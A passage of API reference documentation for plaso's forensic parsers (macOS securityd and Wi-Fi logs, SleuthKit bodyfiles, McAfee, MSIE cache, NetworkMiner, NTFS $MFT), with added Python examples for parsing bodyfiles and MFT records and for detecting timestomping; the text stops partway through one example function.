    classmethod GetFormatSpecification()
        Retrieves the format specification.
        Returns: format specification.
        Return type: FormatSpecification

    ParseFileObject(parser_mediator, file_object)
        Parses a MacOS keychain file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.mac_securityd module

Parses MacOS security daemon (securityd) log files.
Also see: https://opensource.apple.com/source/Security/Security-55471/sec/securityd

class plaso.parsers.mac_securityd.MacOSSecuritydLogEventData
    Bases: plaso.containers.events.EventData
    MacOS securityd log event data.

    caller (str) – caller, consists of two hex numbers.
    facility (str) – facility.
    level (str) – priority level.
    message (str) – message.
    security_api (str) – name of securityd function.
    sender_pid (int) – process identifier of the sender.
    sender (str) – name of the sender.

    DATA_TYPE = 'mac:securityd:line'

class plaso.parsers.mac_securityd.MacOSSecuritydLogParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
    Parses MacOS security daemon (securityd) log files.

    DATA_FORMAT = 'MacOS security daemon (securityd) log file'
    DATE_TIME = Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})
    LINE_STRUCTURES = [('logline', {{{{{{{{{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) !W:([)} Suppress:("[")} W:(0123...)} Suppress:("]")} Suppress:("<")} !W:(>)} Suppress:(">")} Suppress:("[")} !W:({)} Suppress:("{")} [!W:(})]} Suppress:("}")} [!W:(]:)]} Suppress:("]:")} SkipTo:(lineEnd)}), ('repeated', {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("--- last message repeated")} W:(0123...)} Suppress:("time ---")})]
    NAME = 'mac_securityd'
    REPEATED_LINE = {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("--- last message repeated")} W:(0123...)} Suppress:("time ---")}
    SECURITYD_LINE = {{{{{{{{{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) !W:([)} Suppress:("[")} W:(0123...)} Suppress:("]")} Suppress:("<")} !W:(>)} Suppress:(">")} Suppress:("[")} !W:({)} Suppress:("{")} [!W:(})]} Suppress:("}")} [!W:(]:)]} Suppress:("]:")} SkipTo:(lineEnd)}

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a securityd log file.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.
        Returns: True if the line is in the expected format, False if not.
        Return type: bool

plaso.parsers.mac_wifi module

Parser for MacOS Wifi log (wifi.log) files.

class plaso.parsers.mac_wifi.MacWifiLogEventData
    Bases: plaso.containers.events.EventData
    Mac Wifi log event data.

    action (str) – known WiFi action, for example connected to an AP, configured, etc. If the action is not known, the value is the message of the log (text variable).
    agent (str) – name and identifier of process that generated the log message.
    function (str) – name of function that generated the log message.
    text (str) – log message.

    DATA_TYPE = 'mac:wifilog:line'

class plaso.parsers.mac_wifi.MacWifiLogParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
    Parses MacOS Wifi log (wifi.log) files.

    DATA_FORMAT = 'MacOS Wifi log (wifi.log) file'
    LINE_STRUCTURES = [('header', {Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) "***Starting Up***"}), ('turned_over_header', {Group:({{W:(ABCD..., abcd...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Combine:({{{W:(0123...) W:(0123...)} "logfile turned over"} LineEnd})}), ('known_function_logline', {{{{Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) {{"<" Combine:({"airportd" !W:(>)})} ">"}} airportdProcessDLILEvent | _doAutoJoin | _processSystemPSKAssoc} ":"} SkipTo:(lineEnd)}), ('logline', {{Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) ~{{{{{"<" Combine:({"airportd" !W:(>)})} ">"} airportdProcessDLILEvent | _doAutoJoin | _processSystemPSKAssoc} ":"}}} SkipTo:(lineEnd)})]
    NAME = 'macwifi'
    THREE_DIGITS = W:(0123...)
    THREE_LETTERS = W:(ABCD...)

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a Mac Wifi log file.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.
        Returns: True if the line is in the expected format, False if not.
        Return type: bool

plaso.parsers.mactime module

Parser for the Sleuthkit (TSK) mactime bodyfile format.

Sleuthkit version 3 format:
    MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime
    0|/lost+found|11|d/drwx------|0|0|12288|1337961350|1337961350|1337961350|0

More information about the format specifications can be read here: https://forensicswiki.xyz/wiki/index.php?title=Bodyfile

class plaso.parsers.mactime.MactimeEventData
    Bases: plaso.containers.events.EventData
    Mactime event data.

    filename (str) – name of the file.
    inode (int) – “inode” of the file. Note that inode is an overloaded term in the context of mactime and used for MFT entry index values as well.
    md5 (str) – MD5 hash of the file content, formatted as a hexadecimal string.
    mode_as_string (str) – protection mode.
    offset (int) – number of the corresponding line, from which the event data was extracted.
    size (int) – size of the file content.
    symbolic_link_target (str) – path of the symbolic link target.
    user_gid (int) – user group identifier (GID).
    user_sid (str) – user security identifier (SID).

    DATA_TYPE = 'fs:mactime:line'

class plaso.parsers.mactime.MactimeParser
    Bases: plaso.parsers.interface.FileObjectParser
    SleuthKit bodyfile parser.

    DATA_FORMAT = 'SleuthKit version 3 bodyfile'
    NAME = 'mactime'

    ParseFileObject(parser_mediator, file_object)
        Parses a mactime bodyfile file-like object.
        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.manager module

The parsers and plugins manager. class plaso.parsers.manager.ParsersManager Bases: object The parsers and plugins manager. ALL_PLUGINS = {'*'} classmethod CheckFilterExpression(parser_filter_expression) Checks parser and plugin names in a parser filter expression. Parameters parser_filter_expression (str) – parser filter expression, where None repre- sents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax. This function does not support presets, and requires a parser filter expression where presets have been expanded. Returns containing: • set(str): parser filter expression elements that contain known parser and/or plugin names. • set(str): parser filter expression elements that contain unknown parser and/or plugin names. Return type tuple

  classmethod CreateSignatureScanner(specification_store)

    Creates a signature scanner for format specifications with signatures.

    Parameters:
      specification_store (FormatSpecificationStore): format specifications with signatures.

    Returns:
      pysigscan.scanner: signature scanner.

  classmethod DeregisterParser(parser_class)

    Deregisters a parser class. The parser classes are identified based on their lower case name.

    Parameters:
      parser_class (type): parser class (subclass of BaseParser).

    Raises:
      KeyError: if parser class is not set for the corresponding name.

  classmethod GetFormatsWithSignatures(parser_filter_expression=None)

    Retrieves the format specifications that have signatures.

    This method will create a specification store for parsers that define a format specification with signatures and a list of parser names for those that do not.

    Parameters:
      parser_filter_expression (Optional[str]): parser filter expression, where None represents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax. This function does not support presets, and requires a parser filter expression where presets have been expanded.

    Returns:
      tuple containing:
        FormatSpecificationStore: format specifications with signatures.
        list[str]: names of parsers that do not have format specifications with signatures, or have signatures but also need to be applied 'brute force'.

  classmethod GetNamesOfParsersWithPlugins()

    Retrieves the names of all parsers with plugins.

    Returns:
      list[str]: names of all parsers with plugins.

  classmethod GetParserObjectByName(parser_name)

    Retrieves a specific parser object by its name.

    Parameters:
      parser_name (str): name of the parser.

    Returns:
      BaseParser: parser object or None.

  classmethod GetParserObjects(parser_filter_expression=None)

    Retrieves the parser objects.

    Parameters:
      parser_filter_expression (Optional[str]): parser filter expression, where None represents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax. This function does not support presets, and requires a parser filter expression where presets have been expanded.

    Returns:
      dict[str, BaseParser]: parsers per name.

  classmethod GetParserPluginsInformation(parser_filter_expression=None)

    Retrieves the parser plugins information.

    Parameters:
      parser_filter_expression (Optional[str]): parser filter expression, where None represents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax. This function does not support presets, and requires a parser filter expression where presets have been expanded.

    Returns:
      list[tuple[str, str]]: pairs of parser plugin names and descriptions.

  classmethod GetParsersInformation()

    Retrieves the parsers information.

    Returns:
      list[tuple[str, str]]: parser names and descriptions.

  classmethod RegisterParser(parser_class)

    Registers a parser class. The parser classes are identified based on their lower case name.

    Parameters:
      parser_class (type): parser class (subclass of BaseParser).

    Raises:
      KeyError: if parser class is already set for the corresponding name.

  classmethod RegisterParsers(parser_classes)

    Registers parser classes. The parser classes are identified based on their lower case name.

    Parameters:
      parser_classes (list[type]): parser classes (subclasses of BaseParser).

    Raises:
      KeyError: if parser class is already set for the corresponding name.

plaso.parsers.mcafeeav module

Parser for McAfee Anti-Virus Logs.

McAfee AV uses 4 logs to track when scans were run, when virus databases were updated, and when files match the virus database.

class plaso.parsers.mcafeeav.McafeeAVEventData

  Bases: plaso.containers.events.EventData

  McAfee AV Log event data.

  action (str): action.
  filename (str): filename.
  offset (int): offset of the line relative to the start of the file, from which the event data was extracted.
  rule (str): rule.
  status (str): status.
  trigger_location (str): trigger location.
  username (str): username.

  DATA_TYPE = 'av:mcafee:accessprotectionlog'

class plaso.parsers.mcafeeav.McafeeAccessProtectionParser

  Bases: plaso.parsers.dsv_parser.DSVParser

  Parses the McAfee AV Access Protection Log.

  COLUMNS = ['date', 'time', 'status', 'username', 'filename', 'trigger_location', 'rule', 'action']

  DATA_FORMAT = 'McAfee Anti-Virus access protection log file'

  DELIMITER = '\t'

  NAME = 'mcafee_protection'

  ParseRow(parser_mediator, row_offset, row)

    Parses a line of the log file and produces events.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      row_offset (int): offset of the line from which the row was extracted.
      row (dict[str, str]): fields of a single row, as specified in COLUMNS.

  VerifyRow(parser_mediator, row)

    Verifies if a line of the file is in the expected format.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      row (dict[str, str]): fields of a single row, as specified in COLUMNS.

    Returns:
      bool: True if this is the correct parser, False otherwise.

plaso.parsers.mediator module

The parser mediator.

class plaso.parsers.mediator.ParserMediator(session, storage_writer, knowledge_base, collection_filters_helper=None, preferred_year=None, resolver_context=None, temporary_directory=None)

  Bases: object

  Parser mediator.

  collection_filters_helper (CollectionFiltersHelper): collection filters helper.
  last_activity_timestamp (int): timestamp received that indicates the last time activity was observed. The last activity timestamp is updated when the mediator produces an attribute container, such as an event source. This timestamp is used by the multi processing worker process to indicate the last time the worker was known to be active. This information is then used by the foreman to detect workers that are not responding (stalled).

  AppendToParserChain(plugin_or_parser)

    Adds a parser or parser plugin to the parser chain.

    Parameters:
      plugin_or_parser (BaseParser): parser or parser plugin.

  ClearParserChain()

    Clears the parser chain.

  GetCurrentYear()

    Retrieves the current year.

    Returns:
      int: the current year.

  GetDisplayName(file_entry=None)

    Retrieves the display name for a file entry.

    Parameters:
      file_entry (Optional[dfvfs.FileEntry]): file entry object, where None will return the display name of self._file_entry.

    Returns:
      str: human readable string that describes the path to the file entry.

    Raises:
      ValueError: if the file entry is missing.

  GetDisplayNameForPathSpec(path_spec)

    Retrieves the display name for a path specification.

    Parameters:
      path_spec (dfvfs.PathSpec): path specification.

    Returns:
      str: human readable version of the path specification.

  GetEstimatedYear()

    Retrieves an estimate of the year. This function determines the year in the following manner:

      * determine if the user provided a preferred year;
      * determine if the knowledge base defines a year derived from preprocessing;
      * determine the year based on the file entry metadata;
      * default to the current year.

    Returns:
      int: estimated year.

  GetFileEntry()

    Retrieves the active file entry.

    Returns:
      dfvfs.FileEntry: file entry.

  GetFilename()

    Retrieves the name of the active file entry.

    Returns:
      str: name of the active file entry or None.

  GetLatestYear()

    Retrieves the latest (newest) year for an event from a file. This function tries to determine the year based on the file entry metadata; if that fails, the current year is used.

    Returns:
      int: year of the file entry or the current year.

  GetParserChain()

    Retrieves the current parser chain.

    Returns:
      str: parser chain.

  GetRelativePath()

    Retrieves the relative path of the current file entry.

    Returns:
      str: relative path of the current file entry or None if there is no current file entry.

  GetRelativePathForPathSpec(path_spec)

    Retrieves the relative path for a path specification.

    Parameters:
      path_spec (dfvfs.PathSpec): path specification.

    Returns:
      str: relative path of the path specification.

  PopFromParserChain()

    Removes the last added parser or parser plugin from the parser chain.

  ProduceEventDataStream(event_data_stream)

    Produces an event data stream.

    Parameters:
      event_data_stream (EventDataStream): an event data stream or None if no event data stream is needed.

    Raises:
      RuntimeError: when storage writer is not set.

  ProduceEventSource(event_source)

    Produces an event source.

    Parameters:
      event_source (EventSource): an event source.

    Raises:
      RuntimeError: when storage writer is not set.

  ProduceEventWithEventData(event, event_data)

    Produces an event.

    Parameters:
      event (EventObject): event.
      event_data (EventData): event data.

    Raises:
      InvalidEvent: if the event date_time or timestamp value is not set, or the timestamp value is out of bounds, or if the event data (attribute container) values cannot be hashed.

  ProduceExtractionWarning(message, path_spec=None)

    Produces an extraction warning.

    Parameters:
      message (str): message of the warning.
      path_spec (Optional[dfvfs.PathSpec]): path specification, where None will use the path specification of the current file entry set in the mediator.

    Raises:
      RuntimeError: when storage writer is not set.

  ProduceRecoveryWarning(message, path_spec=None)

    Produces a recovery warning.

    Parameters:
      message (str): message of the warning.
      path_spec (Optional[dfvfs.PathSpec]): path specification, where None will use the path specification of the current file entry set in the mediator.

    Raises:
      RuntimeError: when storage writer is not set.

  ResetFileEntry()

    Resets the active file entry.

  SampleMemoryUsage(parser_name)

    Takes a sample of the memory usage for profiling.

    Parameters:
      parser_name (str): name of the parser.

  SampleStartTiming(parser_name)

    Starts timing a CPU time sample for profiling.

    Parameters:
      parser_name (str): name of the parser.

  SampleStopTiming(parser_name)

    Stops timing a CPU time sample for profiling.

    Parameters:
      parser_name (str): name of the parser.

  SetFileEntry(file_entry)

    Sets the active file entry.

    Parameters:
      file_entry (dfvfs.FileEntry): file entry.

  SetStorageWriter(storage_writer)

    Sets the storage writer.

    Parameters:
      storage_writer (StorageWriter): storage writer.

  SignalAbort()

    Signals the parsers to abort.

  StartProfiling(configuration, identifier, process_information)

    Starts profiling.

    Parameters:
      configuration (ProfilingConfiguration): profiling configuration.
      identifier (str): identifier of the profiling session used to create the sample filename.
      process_information (ProcessInfo): process information.

  StopProfiling()

    Stops profiling.

  property abort (bool): True if parsing should be aborted.
  property codepage (str): codepage.
  property number_of_produced_event_sources (int): number of produced event sources.
  property number_of_produced_events (int): number of produced events.
  property number_of_produced_extraction_warnings (int): number of produced extraction warnings.
  property resolver_context (dfvfs.Context): resolver context.
  property temporary_directory (str): path of the directory for temporary files.
  property timezone (datetime.tzinfo): timezone.
  property year (int): year.

plaso.parsers.msiecf module

Parser for Microsoft Internet Explorer (MSIE) Cache Files (CF).

class plaso.parsers.msiecf.MSIECFLeakEventData

  Bases: plaso.containers.events.EventData

  MSIECF leak event data.

  cached_filename (str): name of the cached file.
  cached_file_size (int): size of the cached file.
  cache_directory_index (int): index of the cache directory.
  cache_directory_name (str): name of the cache directory.
  offset (int): offset of the MSIECF item relative to the start of the file, from which the event data was extracted.
  recovered (bool): True if the item was recovered.

  DATA_TYPE = 'msiecf:leak'

class plaso.parsers.msiecf.MSIECFParser

  Bases: plaso.parsers.interface.FileObjectParser

  Parses MSIE Cache Files (MSIECF).

  DATA_FORMAT = 'Microsoft Internet Explorer (MSIE) 4 - 9 cache (index.dat) file'

  classmethod GetFormatSpecification()

    Retrieves the format specification.

    Returns:
      FormatSpecification: format specification.

  NAME = 'msiecf'

  ParseFileObject(parser_mediator, file_object)

    Parses a MSIE Cache File (MSIECF) file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): file-like object.

class plaso.parsers.msiecf.MSIECFRedirectedEventData

  Bases: plaso.containers.events.EventData

  MSIECF redirected event data.

  offset (int): offset of the MSIECF item relative to the start of the file, from which the event data was extracted.
  recovered (bool): True if the item was recovered.
  url (str): location URL.

  DATA_TYPE = 'msiecf:redirected'

class plaso.parsers.msiecf.MSIECFURLEventData

  Bases: plaso.containers.events.EventData

  MSIECF URL event data.

  cached_filename (str): name of the cached file.
  cached_file_size (int): size of the cached file.
  cache_directory_index (int): index of the cache directory.
  cache_directory_name (str): name of the cache directory.
  http_headers (str): HTTP headers.
  number_of_hits (int): number of hits.
  offset (int): offset of the MSIECF item relative to the start of the file, from which the event data was extracted.
  recovered (bool): True if the item was recovered.
  url (str): location URL.

  DATA_TYPE = 'msiecf:url'

plaso.parsers.networkminer module

Parser for NetworkMiner .fileinfos files.

class plaso.parsers.networkminer.NetworkMinerEventData

  Bases: plaso.containers.events.EventData

  NetworkMiner event data.

  destination_ip (str): destination IP address.
  destination_port (str): destination port number.
  file_details (str): details about the file.
  file_md5 (str): MD5 hash of the file.
  file_path (str): file path to where it was downloaded.
  file_size (str): size of the file.
  filename (str): name of the file.
  source_ip (str): originating IP address.
  source_port (str): originating port number.

  DATA_TYPE = 'networkminer:fileinfos:file'

class plaso.parsers.networkminer.NetworkMinerParser

  Bases: plaso.parsers.dsv_parser.DSVParser

  Parser for NetworkMiner .fileinfos files.

  COLUMNS = ('source_ip', 'source_port', 'destination_ip', 'destination_port', 'filename', 'file_path', 'file_size', 'unused', 'file_md5', 'unused2', 'file_details', 'unused4', 'timestamp')

  DATA_FORMAT = 'NetworkMiner .fileinfos file'

  MIN_COLUMNS = 13

  NAME = 'networkminer_fileinfo'

  ParseRow(parser_mediator, row_offset, row)

    Parses a line of the log file and produces events.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      row_offset (int): line number of the row.
      row (dict[str, str]): fields of a single row, as specified in COLUMNS.

  VerifyRow(parser_mediator, row)

    Verifies if a line of the file is in the expected format.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      row (dict[str, str]): fields of a single row, as specified in COLUMNS.

    Returns:
      bool: True if this is the correct parser, False otherwise.
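The mactime, McAfee access-protection and NetworkMiner parsers share one contract: DSVParser splits each line on DELIMITER, zips the fields into a dict keyed by COLUMNS, asks VerifyRow whether the first row looks right (so the wrong parser bows out instead of emitting garbage events), and hands each row with its row_offset to ParseRow. The block below is an added example, not plaso's DSVParser or mactime parser: it re-implements that contract stand-alone and applies it to the SleuthKit version 3 bodyfile, whose column order is the one quoted in the mactime parser documentation. The first sample line is the one from that documentation; the other two are constructed. The timestamp labels, the treatment of 0 as "not recorded", of NTFS-style entry-type-id inodes and of "name -> target" symbolic links are my choices, not something the page specifies.

```python
"""A stand-alone version of the DSVParser contract (COLUMNS, DELIMITER,
MIN_COLUMNS, VerifyRow, ParseRow), applied to the SleuthKit version 3 bodyfile.
Added example, not plaso code: the bodyfile column order is the one documented
for the mactime parser; everything else here is my own design."""
import csv
import io

BODYFILE_COLUMNS = ("md5", "name", "inode", "mode_as_string", "uid", "gid",
                    "size", "atime", "mtime", "ctime", "crtime")
# Timeline labels for the four timestamp columns (my naming, assumed).
TIMESTAMP_DESCRIPTIONS = (("atime", "Last Access Time"),
                          ("mtime", "Content Modification Time"),
                          ("ctime", "Metadata Modification Time"),
                          ("crtime", "Creation Time"))


def iter_rows(text, columns, delimiter=",", min_columns=None, verify_row=None,
              quoting=csv.QUOTE_MINIMAL):
    """Yield (row_offset, row) pairs the way DSVParser feeds ParseRow.

    row maps each name in columns to a field; rows with fewer than min_columns
    fields are skipped; verify_row is applied to the first usable row only and
    a failure rejects the whole input (the "wrong parser" case). row_offset is
    the 1-based line number here (plaso reports a line number for mactime and
    NetworkMiner and a byte offset for McAfee).
    """
    min_columns = min_columns or len(columns)
    verified = verify_row is None
    reader = csv.reader(io.StringIO(text), delimiter=delimiter, quoting=quoting)
    for line_number, fields in enumerate(reader, start=1):
        if len(fields) < min_columns:
            continue
        row = dict(zip(columns, fields))
        if not verified:
            if not verify_row(row):
                raise ValueError("line %d is not in the expected format" % line_number)
            verified = True
        yield line_number, row


def verify_bodyfile_row(row):
    """VerifyRow: size and all four timestamps must be integers and the inode
    must start with one (NTFS bodyfiles write entry-type-id, e.g. 2048-128-3)."""
    try:
        int(row["size"])
        int(row["inode"].split("-")[0])
        for column, _ in TIMESTAMP_DESCRIPTIONS:
            int(row[column])
    except (KeyError, ValueError):
        return False
    return True


def parse_bodyfile_row(row_offset, row):
    """ParseRow: one event per non-zero timestamp column.

    A 0 timestamp means "not recorded", not 1970-01-01, so it must not become
    an event; "name -> target" is how bodyfiles encode a symbolic link.
    """
    name, arrow, target = row["name"].partition(" -> ")
    events = []
    for column, description in TIMESTAMP_DESCRIPTIONS:
        timestamp = int(row[column])
        if timestamp == 0:
            continue
        events.append({"timestamp": timestamp,           # POSIX seconds, as in the file
                       "timestamp_desc": description,
                       "filename": name,
                       "symbolic_link_target": target if arrow else None,
                       "inode": int(row["inode"].split("-")[0]),
                       "mode_as_string": row["mode_as_string"],
                       "size": int(row["size"]),
                       "md5": None if row["md5"] == "0" else row["md5"],
                       "offset": row_offset})
    return events


def parse_bodyfile(text):
    """Whole-file driver: a flat list of events in timestamp order."""
    events = []
    for row_offset, row in iter_rows(text, BODYFILE_COLUMNS, delimiter="|",
                                     verify_row=verify_bodyfile_row, quoting=csv.QUOTE_NONE):
        events.extend(parse_bodyfile_row(row_offset, row))
    return sorted(events, key=lambda event: event["timestamp"])


# Constructed input: line 1 is the sample from the mactime parser documentation;
# lines 2 and 3 are made up to exercise an NTFS-style inode, a symbolic link
# and unset timestamps.
SAMPLE_BODYFILE = """\
0|/lost+found|11|d/drwx------|0|0|12288|1337961350|1337961350|1337961350|0
0|/Windows/System32/cmd.exe|2048-128-3|r/rrwxrwxrwx|0|0|289792|1337900000|1337800000|1337850000|1337700000
0|/etc/localtime -> /usr/share/zoneinfo/UTC|42|l/lrwxrwxrwx|0|0|29|1337961351|0|0|0
"""

if __name__ == "__main__":
    for event in parse_bodyfile(SAMPLE_BODYFILE):
        print(event["timestamp"], event["timestamp_desc"], event["filename"])
```

The same iter_rows driver serves a tab-delimited McAfee log (delimiter="\t", the eight COLUMNS listed above) or a NetworkMiner .fileinfos file (MIN_COLUMNS=13); only verify_row and parse_row change. Verifying on the first row only is deliberate and matches the DSVParser contract: it is a format sniff, not per-row validation, so parse_row must still cope with bad fields later in the file.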

plaso.parsers.ntfs module

Parser for NTFS metadata files.

class plaso.parsers.ntfs.NTFSFileStatEventData

  Bases: plaso.containers.events.EventData

  NTFS file system stat event data.

  attribute_type (int): attribute type, for example 0x00000030, which represents $FILE_NAME.
  display_name (str): display name.
  file_attribute_flags (int): NTFS file attribute flags.
  file_reference (int): NTFS file reference.
  file_system_type (str): file system type.
  filename (str): name of the file.
  is_allocated (bool): True if the MFT entry is allocated (marked as in use).
  name (str): name associated with the stat event, for example that of a $FILE_NAME attribute, or None if not available.
  parent_file_reference (int): NTFS file reference of the parent.
  path_hints (list[str]): hints about the full path of the file.
  symbolic_link_target (str): path of the symbolic link target.

  DATA_TYPE = 'fs:stat:ntfs'

class plaso.parsers.ntfs.NTFSMFTParser

  Bases: plaso.parsers.interface.FileObjectParser

  Parses a NTFS $MFT metadata file.

  DATA_FORMAT = 'NTFS $MFT metadata file'

  classmethod GetFormatSpecification()

    Retrieves the format specification.

    Returns:
      FormatSpecification: format specification.

  NAME = 'mft'

  ParseFileObject(parser_mediator, file_object)

    Parses a NTFS $MFT metadata file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): file-like object.
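The $MFT parser produces stat events from both the $STANDARD_INFORMATION and the $FILE_NAME attribute of each entry, and attribute_type tells you which of the two a timestamp came from. That distinction is what an investigator cares about: $STANDARD_INFORMATION times can be set by any process with write access to the file, $FILE_NAME times cannot. The block below is an added example, not plaso's parser (plaso reads the $MFT through libfsntfs): it parses one FILE record from bytes, including the update-sequence fixups, produces the fields listed above (file_reference, parent_file_reference, is_allocated, name, attribute types) and compares the two timestamp sets the way a timestomping check does. The record layout is the documented NTFS on-disk format; the sample record, its name and its timestamps are constructed.

```python
"""Parse an NTFS $MFT FILE record stand-alone: undo the fixups, read the
resident $STANDARD_INFORMATION (0x10) and $FILE_NAME (0x30) attributes, build
file references and compare the two timestamp sets. Added example, not plaso's
NTFS parser (which uses libfsntfs); the sample record below is constructed."""
import struct
from datetime import datetime, timedelta, timezone

SECTOR_SIZE = 512
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
ATTR_STANDARD_INFORMATION, ATTR_FILE_NAME, ATTR_END = 0x10, 0x30, 0xFFFFFFFF
FLAG_IN_USE, FLAG_DIRECTORY = 0x0001, 0x0002   # FILE record header flags
TIME_KEYS = ("creation", "modification", "mft_modification", "access")

def filetime_to_datetime(filetime):
    """FILETIME counts 100 ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)

def datetime_to_filetime(value):
    delta = value - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10

def apply_fixups(record):
    """On disk the last two bytes of every sector hold the update sequence number and
    the originals sit in the update sequence array; a mismatch means a torn write or
    a forged record, so refuse it rather than parse garbage."""
    data = bytearray(record)
    usa_offset, usa_count = struct.unpack_from("<HH", data, 4)
    usn = data[usa_offset:usa_offset + 2]
    for index in range(1, usa_count):
        end = index * SECTOR_SIZE
        if data[end - 2:end] != usn:
            raise ValueError("fixup mismatch in sector %d" % (index - 1))
        data[end - 2:end] = data[usa_offset + 2 * index:usa_offset + 2 * index + 2]
    return bytes(data)

def parse_mft_record(record):
    """Return the fields NTFSFileStatEventData exposes for one 1024-byte record."""
    if record[:4] != b"FILE":
        raise ValueError("not a FILE record")
    data = apply_fixups(record)
    (sequence, link_count, offset, flags, used_size, _alloc, _base, _next, _pad,
     record_number) = struct.unpack_from("<HHHHIIQHHI", data, 0x10)
    parsed = {"file_reference": record_number | (sequence << 48),  # 48-bit entry, 16-bit sequence
              "is_allocated": bool(flags & FLAG_IN_USE), "is_directory": bool(flags & FLAG_DIRECTORY),
              "link_count": link_count, "attributes": [], "file_names": []}
    while offset + 8 <= used_size:
        attr_type, attr_length = struct.unpack_from("<II", data, offset)
        if attr_type == ATTR_END or attr_length == 0:
            break
        if not data[offset + 8]:  # resident attribute: the content is inside the record
            content_length, content_offset = struct.unpack_from("<IH", data, offset + 0x10)
            content = data[offset + content_offset:offset + content_offset + content_length]
            if attr_type == ATTR_STANDARD_INFORMATION:
                parsed["standard_information"] = dict(zip(TIME_KEYS, struct.unpack_from("<4Q", content, 0)))
            elif attr_type == ATTR_FILE_NAME:
                entry = dict(zip(TIME_KEYS, struct.unpack_from("<4Q", content, 8)))
                entry["parent_file_reference"] = struct.unpack_from("<Q", content, 0)[0]
                name_length, entry["namespace"] = struct.unpack_from("<BB", content, 64)
                entry["name"] = content[66:66 + 2 * name_length].decode("utf-16-le")
                parsed["file_names"].append(entry)
        parsed["attributes"].append(attr_type)
        offset += attr_length
    return parsed

def timestomp_indicators(parsed):
    """$FILE_NAME times are written by the kernel on create/rename and are not reachable
    through SetFileTime, so $SI times earlier than $FN times, or $SI times with zero
    fractional seconds, are the classic timestomping signs."""
    si = parsed.get("standard_information")
    indicators = []
    for fn in parsed["file_names"] if si else ():
        if si["creation"] < fn["creation"]:
            indicators.append("$SI creation predates $FN creation of %r" % fn["name"])
    if si and all(value % 10_000_000 == 0 for value in si.values()):
        indicators.append("$SI timestamps have no fractional seconds")
    return indicators

def build_record(record_number, sequence, name, parent_reference, si_times, fn_times, flags=FLAG_IN_USE):
    """Construct a 1024-byte FILE record with resident $SI and $FN, encoded as on disk."""
    contents = ((ATTR_STANDARD_INFORMATION, struct.pack("<4Q", *si_times) + bytes(16)),
                (ATTR_FILE_NAME, struct.pack("<Q4QQQIIBB", parent_reference, *fn_times, 0, 0, 0, 0,
                                             len(name), 1) + name.encode("utf-16-le")))
    attributes = b""
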